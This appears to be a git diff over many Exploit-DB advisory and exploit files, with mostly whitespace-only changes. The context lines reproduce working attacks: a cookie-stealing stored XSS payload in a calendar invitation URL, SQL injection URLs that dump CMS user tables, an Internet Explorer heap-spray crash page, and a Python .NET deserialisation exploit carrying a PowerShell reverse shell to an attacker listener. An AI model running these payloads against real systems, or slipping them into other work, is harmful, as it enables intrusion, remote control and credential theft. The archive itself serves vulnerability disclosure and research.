-sf=true&output=js&action=CREATE&useproto=true&add=boumediene.k%40victim.dz%2Csnbemail%40gmail.com&crm=BUSY&icc=DEFAULT&sprop=goo.allowModify%3Afalse&sprop=goo.allowInvitesOther%3Atrue&sprop=goo.showInvitees%3Atrue&pprop=eventColor%3Anone&eid=762dgnlok9l44rd63im4kisjnd&eref=762dgnlok9l33rd55im4kisjnd&cts=1511425384353&text=%22%3E%3Cimg%20src%3DX%20onerror%3Dalert(document.cookie)%3E&location=Stored%20XSS&details=Stored%20XSS&src=snbemail%40gmail.com&dates=20171123T093000%2F20171123T103000&unbounded=false&gdoc-attachment&scfdata=W1tdXQ..&stz&etz&scp=ONE&nopts=2&nopts=3&nopts=4&hl=en_GB&secid=6VLs1BGsgBB_Tqz6egnXpCYYF24
+sf=true&output=js&action=CREATE&useproto=true&add=boumediene.k%40victim.dz%2Csnbemail%40gmail.com&crm=BUSY&icc=DEFAULT&sprop=goo.allowModify%3Afalse&sprop=goo.allowInvitesOther%3Atrue&sprop=goo.showInvitees%3Atrue&pprop=eventColor%3Anone&eid=762dgnlok9l44rd63im4kisjnd&eref=762dgnlok9l33rd55im4kisjnd&cts=1511425384353&text=%22%3E%3Cimg%20src%3DX%20onerror%3Dalert(document.cookie)%3E&location=Stored%20XSS&details=Stored%20XSS&src=snbemail%40gmail.com&dates=20171123T093000%2F20171123T103000&unbounded=false&gdoc-attachment&scfdata=W1tdXQ..&stz&etz&scp=ONE&nopts=2&nopts=3&nopts=4&hl=en_GB&secid=6VLs1BGsgBB_Tqz6egnXpCYYF24
 Once the victim receives the invitation, he/she will not be obliged to click on any link or download any file. The only condition for this PoC to work is a single click to read the email. Once the victim reads the email, the code gets executed on the victim's browser ending up sending sensitive data to the adversary.
@ -146,7 +146,7 @@ In order to leverage this vulnerability, a victim must first acquire a local mai
    The victim reads the email using Crystal webmail and the code gets executed.
-Remediation:
+Remediation:
 Sanitize, escape and validate user supplied data accordingly
--- a/exploits/multiple/webapps/44360.txt
+++ b/exploits/multiple/webapps/44360.txt
@ -58,7 +58,7 @@ value="test" />
 </html>
-3] POCs and steps:
+3] POCs and steps:
 https://nileshsapariya.blogspot.ae/2018/03/csrf-to-xss-open-auditit-professional-21.html
--- a/exploits/php/webapps/18873.txt
+++ b/exploits/php/webapps/18873.txt
@ -138,7 +138,7 @@ For demonstration or reproduce ...
 Review: Zensur - Bad Word & Listing
-<td class="mbox" width="45%">"><[EXECUTION OF SCRIPT CODE HERE!]' <<="" td="">
+<td class="mbox" width="45%">"><[EXECUTION OF SCRIPT CODE HERE!]' <<="" td="">
  </tr>
  <tr>
@ -210,7 +210,7 @@ URL: http://127.0.0.1:8080/viscacha/pm.php
 Review: PN Message Preview - Arrived Message - Inbox
 <div class="bbody">
-<span class="stext">Betreff:
+<span class="stext">Betreff:
 <strong>"><[EXECUTION OF SCRIPT CODE HERE!] <</strong>
 </span>
 <hr>
--- a/exploits/php/webapps/22907.txt
+++ b/exploits/php/webapps/22907.txt
@ -20,7 +20,7 @@ http://localhost/page.php?id=[sqli]
 # D3mo :
-http://server/page.php?id=-1+union+select+1,2,3,group_concat(column_name),5,6+from+information_schema.columns+where+table_name=char(table_cod)
+http://server/page.php?id=-1+union+select+1,2,3,group_concat(column_name),5,6+from+information_schema.columns+where+table_name=char(table_cod)
 http://server/page.php?id=-1+union+select+1,2,3,group_concat(nazwa,0x3a,haslo),5,6+from+es_cms_users
--- a/exploits/php/webapps/33697.txt
+++ b/exploits/php/webapps/33697.txt
@ -1,4 +1,4 @@
-# Exploit Title: Persistent Cross Site Scripting Vulnerability in eFront
+# Exploit Title: Persistent Cross Site Scripting Vulnerability in eFront
 3.6.14.4
 # Date: 05 June 2014
 # Exploit Author: shyamkumar somana
--- a/exploits/php/webapps/34405.txt
+++ b/exploits/php/webapps/34405.txt
@ -1,19 +1,19 @@
-# Exploit Title: Multiple Persistent Cross Site Scripting Vulnerabilities
+# Exploit Title: Multiple Persistent Cross Site Scripting Vulnerabilities
 in PHP Stock Management System 1.02
 # Date: 25 Aug 2014
-# Exploit Author: Ragha Deepthi K R
+# Exploit Author: Ragha Deepthi K R
-# Vendor Homepage: http://www.posnic.com/
+# Vendor Homepage: http://www.posnic.com/
-# Software Link: http://sourceforge.net/projects/stockmanagement/
+# Software Link: http://sourceforge.net/projects/stockmanagement/
-# Version: 1.02
+# Version: 1.02
 # Tested on: Windows 7
 #################################################
-PHP Stock Management System 1.02 is vulnerable for multiple Persistent
+PHP Stock Management System 1.02 is vulnerable for multiple Persistent
-Cross Site Scripting Vulnerabilities.
+Cross Site Scripting Vulnerabilities.
 The vulnerability affects 'sname'(Store Name Field), 'address'(Address
 Field), 'place'(Place Field), 'city'(City Field), pin(Pin Field),
-website(Website Field), email(Email Field) parameters while updating the
+website(Website Field), email(Email Field) parameters while updating the
-store details in 'update_details.php' and when seen in 'view_report.php'
+store details in 'update_details.php' and when seen in 'view_report.php'
 #################################################
-Greetz : Syam !
+Greetz : Syam !
--- a/exploits/php/webapps/35541.txt
+++ b/exploits/php/webapps/35541.txt
@ -1,4 +1,4 @@
-Title: ResourceSpace Multiple Cross Site Scripting, and HTML and SQL
+Title: ResourceSpace Multiple Cross Site Scripting, and HTML and SQL
 Injection Vulnerabilities
 Author: Adler Freiheit
--- a/exploits/php/webapps/35840.txt
+++ b/exploits/php/webapps/35840.txt
@ -1,4 +1,4 @@
-# Exploit Title: Privilege Escalation in RedaxScript 2.1.0
+# Exploit Title: Privilege Escalation in RedaxScript 2.1.0
 # Date: 11-05-2014
 # Exploit Author: shyamkumar somana
 # Vendor Homepage: http://redaxscript.com/
--- a/exploits/php/webapps/41143.rb
+++ b/exploits/php/webapps/41143.rb
@ -1,10 +1,10 @@
 # Exploit Title: Remote PageKit Password Reset Vulnerability
-# Date:21-01-2017
+# Date:21-01-2017
 # Software Link: http://pagekit.com/
-# Exploit Author: Saurabh Banawar from SecureLayer7
+# Exploit Author: Saurabh Banawar from SecureLayer7
-# Contact: http://twitter.com/securelayer7
+# Contact: http://twitter.com/securelayer7
-# Website: https://securelayer7.net
+# Website: https://securelayer7.net
 # Category: webapps
 1. Description
@ -19,7 +19,7 @@ download/pdf/SecureLayer7-Pentest-report-Pagekit-CMS.pdf
 2. Proof of Concept
-require 'net/http'
+require 'net/http'
 #Enter the domain/IP address of the site for which you want to test this vulnerability
 vulnerableSite = 'http://127.0.0.1'
--- a/exploits/php/webapps/42263.txt
+++ b/exploits/php/webapps/42263.txt
@ -41,4 +41,4 @@ user_login,user_pass FROM wp_users WHERE ID=1">
 --
 *Atenciosamente*
-*Lenon Leite*
+*Lenon Leite*
--- a/exploits/php/webapps/42980.txt
+++ b/exploits/php/webapps/42980.txt
@ -6,7 +6,7 @@ https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
 More informations:
 http://whiteboyz.xyz/esic-software-publico-autentication-bypass.html
-The vulnerability is in the login area of e-sic,
+The vulnerability is in the login area of e-sic,
 where we can enter the panel only using some parameters such as
 username and password
 ---------------------------------------------------------------------
--- a/exploits/php/webapps/44028.txt
+++ b/exploits/php/webapps/44028.txt
@ -1,4 +1,4 @@
-# Exploit Title: TypeSetter CMS 5.1 Host Header Injection
+# Exploit Title: TypeSetter CMS 5.1 Host Header Injection
 # Date: 10-02-2018
 # Exploit Author: Navina Asrani
 # Contact: https://twitter.com/NavinaSanjay
--- a/exploits/php/webapps/44029.html
+++ b/exploits/php/webapps/44029.html
@ -37,4 +37,4 @@ Exploit code:
 3. Solution:
-To Mitigate CSRF vulnerability, it is recommeded to enforce security tokens such as anti csrf tokens
+To Mitigate CSRF vulnerability, it is recommeded to enforce security tokens such as anti csrf tokens
--- a/exploits/php/webapps/44137.html
+++ b/exploits/php/webapps/44137.html
@ -1,5 +1,5 @@
 <!--
-# Exploit Title: Front Accounting ERP 2.4.3 - CSRF
+# Exploit Title: Front Accounting ERP 2.4.3 - CSRF
 # Date: 16-02-2018
 # Exploit Author: Samrat Das
 # Contact: http://twitter.com/Samrat_Das93
--- a/exploits/php/webapps/44144.txt
+++ b/exploits/php/webapps/44144.txt
@ -1,4 +1,4 @@
-# Exploit Title: October CMS Stored Code Injection
+# Exploit Title: October CMS Stored Code Injection
 # Date: 16-02-2018
 # Exploit Author: Samrat Das
 # Contact: http://twitter.com/Samrat_Das93
--- a/exploits/php/webapps/44354.txt
+++ b/exploits/php/webapps/44354.txt
@ -25,5 +25,5 @@ Login into Open-AuditIT Professional 2.1
 Visi this page :-
 http://localhost/omk/open-audit/credentials
-3] POCs and steps:
+3] POCs and steps:
 https://nileshsapariya.blogspot.ae/2018/03/csrf-to-xss-open-auditit-professional-21.html
--- a/exploits/php/webapps/44383.html
+++ b/exploits/php/webapps/44383.html
@ -1,4 +1,4 @@
-# Exploit Title: Cross Site Request Forgery- Frog CMS
+# Exploit Title: Cross Site Request Forgery- Frog CMS
 # Date: 31-03-2018
 # Exploit Author: Samrat Das
 # Contact: http://twitter.com/Samrat_Das93
--- a/exploits/php/webapps/45068.txt
+++ b/exploits/php/webapps/45068.txt
@ -1,9 +1,9 @@
-# Exploit Title: Kirby CMS 2.5.12 - Cross-Site Scripting
+# Exploit Title: Kirby CMS 2.5.12 - Cross-Site Scripting
 # Date: 2018-07-22
 # Exploit Author: Zaran Shaikh
-# Version: 2.5.12
+# Version: 2.5.12
-# CVE :  NA
+# CVE :  NA
-# Category: Web Application
+# Category: Web Application
 # Description
 # The application allows user injected payload which can lead to Stored
--- a/exploits/php/webapps/49267.txt
+++ b/exploits/php/webapps/49267.txt
@ -1,4 +1,4 @@
-# Exploit Title: PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection
+# Exploit Title: PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection
 # Date: 2020-12-15
 # Exploit Author: Frederic ADAM
 # Author contact: contact@fadam.eu
--- a/exploits/windows/dos/34458.html
+++ b/exploits/windows/dos/34458.html
@ -2,14 +2,14 @@
 <html>
 <head>
 <meta http-equiv="Cache-Control" content="no-cache"/>
-<script >
+<script >
-function stc()
+function stc()
 {
 var Then = new Date();
 Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 7 );
 document.cookie = "Cookie1=d93kaj3Nja3; expires="+ Then.toGMTString();
 }
-function cid()
+function cid()
 {
 var swf = 0;
 try {
@ -21,28 +21,28 @@ var cookieString = new String(document.cookie);
 if(cookieString.indexOf("d93kaj3Nja3") == -1)
 {stc(); return 1;}else{ return 0;}
 }
-String.prototype.repeat=function (i){return new Array(isNaN(i)?1:++i).join(this);}
+String.prototype.repeat=function (i){return new Array(isNaN(i)?1:++i).join(this);}
-var tpx=unescape ("%u1414%u1414").repeat(0x60/4-1);
+var tpx=unescape ("%u1414%u1414").repeat(0x60/4-1);
 var ll=new Array();
-for (i=0;i<3333;i++)ll.push(document.createElement("img"));
+for (i=0;i<3333;i++)ll.push(document.createElement("img"));
 for(i=0;i<3333;i++) ll[i].className=tpx;
 for(i=0;i<3333;i++) ll[i].className="";
 CollectGarbage();
-function b2()
+function b2()
 {
-try{xdd.replaceNode(document.createTextNode(" "));}catch(exception){}
+try{xdd.replaceNode(document.createTextNode(" "));}catch(exception){}
 try{xdd.outerText='';}catch(exception){}
 CollectGarbage();
 for(i=0;i<3333;i++) ll[i].className=tpx;
 }
-function a1(){
+function a1(){
 if (!cid())
 return;
 document.body.contentEditable="true";
-try{xdd.applyElement(document.createElement("frameset"));}catch(exception){}
+try{xdd.applyElement(document.createElement("frameset"));}catch(exception){}
 try{document.selection.createRange().select();}catch(exception){}
 }
-</ script >
+</ script >
 </head>
 <body onload='setTimeout("a1();",2000);' onresize=b2()>
 <marquee id=xdd > </marquee>
@ -60,12 +60,12 @@ try{document.selection.createRange().select();}catch(exception){}
 ¡¡¡¡<input type=text name=chart size=46 style="font-family:verdana; font-weight:bolder; color:#0066ff; background-color:#fef4d9; padding:0px; border-style:none;">
 ¡¡¡¡
 ¡¡¡¡<input type=text name=percent size=47 style="color:#0066ff; text-align:center; border-width:medium; border-style:none;">
-¡¡¡¡<script > ¡¡
+¡¡¡¡<script > ¡¡
 var bar=0¡¡
 var line="||"¡¡
 var amount="||"¡¡
 count()¡¡
-function count(){¡¡
+function count(){¡¡
 bar=bar+2¡¡
 amount =amount + line¡¡
 document.loading.chart.value=amount¡¡
@ -74,7 +74,7 @@ if (bar<99)¡¡
 {setTimeout("count()",500);}¡¡
 else¡¡
 {window.location = "http://www.google.com.hk";}¡¡
-}</ script >
+}</ script >
 ¡¡</p>
 </form>
 <p align="center"> Wart,<a style="text-decoration: none" href="http://www.google.com.hk"> <font color="#FF0000"> kick me</font> </a> .</p>
--- a/exploits/windows/dos/38272.txt
+++ b/exploits/windows/dos/38272.txt
@ -1,6 +1,6 @@
 Source: https://code.google.com/p/google-security-research/issues/detail?id=304
-Creating a device context with the flag (DCX_NORESETATTRS) and selecting a brush object into the device context will result in the brush being freed on process exit without the reference to the object being cleared. The PoC consists of two files (prime304.cpp  and poc304.cpp). poc304 will execute prime304, which triggers the issue and allows poc304 to retrieve a handle to the device context with the pointer to the freed object. We can confirm this by requesting the handle for the brush object from the device context, resulting in reading freed memory. In some cases the issue leads to memory corruption when for example another object is allocated into the space of the free brush object (see attached crash logs for examples).
+Creating a device context with the flag (DCX_NORESETATTRS) and selecting a brush object into the device context will result in the brush being freed on process exit without the reference to the object being cleared. The PoC consists of two files (prime304.cpp  and poc304.cpp). poc304 will execute prime304, which triggers the issue and allows poc304 to retrieve a handle to the device context with the pointer to the freed object. We can confirm this by requesting the handle for the brush object from the device context, resulting in reading freed memory. In some cases the issue leads to memory corruption when for example another object is allocated into the space of the free brush object (see attached crash logs for examples).
 Proof of Concept:
 https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38272.zip
--- a/exploits/windows/dos/39647.txt
+++ b/exploits/windows/dos/39647.txt
@ -1,6 +1,6 @@
 Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=686
-The attached Proof-of-Concept crashes Windows 7 with special pool enabled on win32k.sys. The crashes are triggering in multiple different ways (two examples attached).
+The attached Proof-of-Concept crashes Windows 7 with special pool enabled on win32k.sys. The crashes are triggering in multiple different ways (two examples attached).
 Proof of Concept:
--- a/exploits/windows/local/35901.txt
+++ b/exploits/windows/local/35901.txt
@ -8,7 +8,7 @@ Severity : High
 CVE ID : CVE-2014-9597
 <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-9597>
-NIST: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9597
+NIST: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9597
 OSVDB ID : 116450 <http://osvdb.org/show/osvdb/116450>
 VLC Ticket : 13389 <https://trac.videolan.org/vlc/ticket/13389>
--- a/exploits/windows/local/35902.txt
+++ b/exploits/windows/local/35902.txt
@ -8,7 +8,7 @@ Severity : High
 CVE ID : CVE-2014-9598
 <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-9598>
-NIST: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9598
+NIST: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9598
 OSVDB ID : 116451 <http://osvdb.org/show/osvdb/116451>
 VLC Ticket : 13390 <https://trac.videolan.org/vlc/ticket/13390>
--- a/exploits/windows/remote/44068.md
+++ b/exploits/windows/remote/44068.md
@ -18,9 +18,9 @@ The privileges of the users are:
 admin – access to all functions on the database without any limitation
 reader – read-only user. The reader can query any records in the database, but can’t modify or delete them. It has no access to internal information, such as the users and roles themselves
 writer – same as the ‘reader’, but it can also create, update and delete records
-ORole structure handles users and their roles and is only accessible by the admin user. OrientDB requires oRole read permissions to allow the user to display the permissions of users and make other queries associated with oRole permissions.
+ORole structure handles users and their roles and is only accessible by the admin user. OrientDB requires oRole read permissions to allow the user to display the permissions of users and make other queries associated with oRole permissions.
-From version 2.2.x and above whenever the oRole is queried with a where, fetchplan and order by statements, this permission requirement is not required and information is returned to unprivileged users.
+From version 2.2.x and above whenever the oRole is queried with a where, fetchplan and order by statements, this permission requirement is not required and information is returned to unprivileged users.
 Example:
--- a/exploits/windows/remote/49216.py
+++ b/exploits/windows/remote/49216.py
@ -12,31 +12,31 @@
 # which is vulnerable to a .NET deserialisation attack.
 #
 #!/usr/bin/python3
-
+
 import base64
 import socket
 import sys
 from struct import pack
-
+
 HOST='192.168.1.1'
 PORT=17001
 LHOST='192.168.1.2'
 LPORT=4444
-
+
 psh_shell = '$client = New-Object System.Net.Sockets.TCPClient("'+LHOST+'",'+str(LPORT)+');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 =$sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
 psh_shell = psh_shell.encode('utf-16')[2:] # remove BOM
 psh_shell = base64.b64encode(psh_shell)
 psh_shell = psh_shell.ljust(1360, b' ')
-
+
 payload = 'AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAAPIKL2MgcG93ZXJzaGVsbC5leGUgLWVuY29kZWRDb21tYW5kIFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFgGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw=='
 payload = base64.b64decode(payload)
 payload = payload.replace(bytes("X"*1360, 'utf-8'), psh_shell)
-
+
 uri = bytes('tcp://{}:{}/Servers'.format(HOST, str(PORT)), 'utf-8')
-
+
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect((HOST,PORT))
-
+
 msg = bytes()
 msg += b'.NET'                 # Header
 msg += b'\x01'                 # Version Major
@ -51,6 +51,6 @@ msg += pack('I', len(uri))     # URI Length
 msg += uri                     # URI
 msg += b'\x00\x00'             # Terminating Header
 msg += payload                 # Data
-
+
 s.send(msg)
 s.close()
--- a/exploits/windows/webapps/24500.txt
+++ b/exploits/windows/webapps/24500.txt
@ -190,7 +190,7 @@ Review: Admin > Admin > New Users & New Group - [groupname, up_availGroups & use
 type="text"></label><label>Password <input class="newform" id="new_password" type="password"><img id="pw_strength" src="/images/common/strength_0.gif"></label><label>Confirm Password: <input class="newform" id="cnf_password" type="password">
 </label><label style="margin-top: 5px; margin-bottom: 8px;" id="up_availGroupsLbl">Place in User Group <select style="display: block;"
 id="up_availGroups"><option value="3"><iframe src="a">    "><[PERSISTENT INJECTED SCRIPT CODE!]") <</iframe></option>
-<option value="1">Administrators</option><option value="2">Guests</option></select></label><input value="Create User" class="button"
+<option value="1">Administrators</option><option value="2">Guests</option></select></label><input value="Create User" class="button"
 style="margin-top: 3px;" type="button"></p></div><a class=""> Users</a><div style="height: 511px; display: none; overflow: hidden;"
 class="genericAccordionContainer"><p id="users_p"><span class="menuLink">admin</span></p></div></div></div>
@ -217,36 +217,36 @@ value="gicon16.png">gicon16.png</option><option value="gicon24.png">gicon24.png<
 ...
-<table class="dataTable" id="fmaps_mapTabList" width="100%"><thead><tr><th style="white-space: nowrap;" nowrap="">Map</th>
+<table class="dataTable" id="fmaps_mapTabList" width="100%"><thead><tr><th style="white-space: nowrap;" nowrap="">Map</th>
 <th style="white-space: nowrap;" nowrap="">Type</th><th style="white-space: nowrap;" nowrap="">Background</th></tr></thead><tbody>
 <tr><td class="" style="white-space: nowrap; padding-right: 5px;" align="left" nowrap=""><a href="#NA"><iframe src="a">%20%20%20%20">
 <iframe src=a onload=alert("VL") <</iframe></a></td><td class="" style="white-space: nowrap;" align="left" nowrap="" width="100%">Google</td>
-<td class="" align="center">-</td></tr></tbody></table>
+<td class="" align="center">-</td></tr></tbody></table>
 ...
 <tbody id="objTbody"><tr id="objTblHdr"><th width="20"><input id="checkAllObj" name="checkAllObj" type="checkbox"></th><th width="20">
-</th><th style="width: 100%;" tf_colkey="objName" class="alignLeft">Object Name</th><th style="text-align: center;" align="center" nowrap="">
+</th><th style="width: 100%;" tf_colkey="objName" class="alignLeft">Object Name</th><th style="text-align: center;" align="center" nowrap="">
 Type</th><th width="20">Membership</th></tr><tr id="obj_tr1"><td class="fmaps_bakTrHi highlightRow"> </td><td class="fmaps_bakTrHi
 highlightRow"><img class="listIcon" src="/images/maps/gicon24.png"></td><td class="alignLeft fmaps_bakTrHi highlightRow"><a title="Click to edit
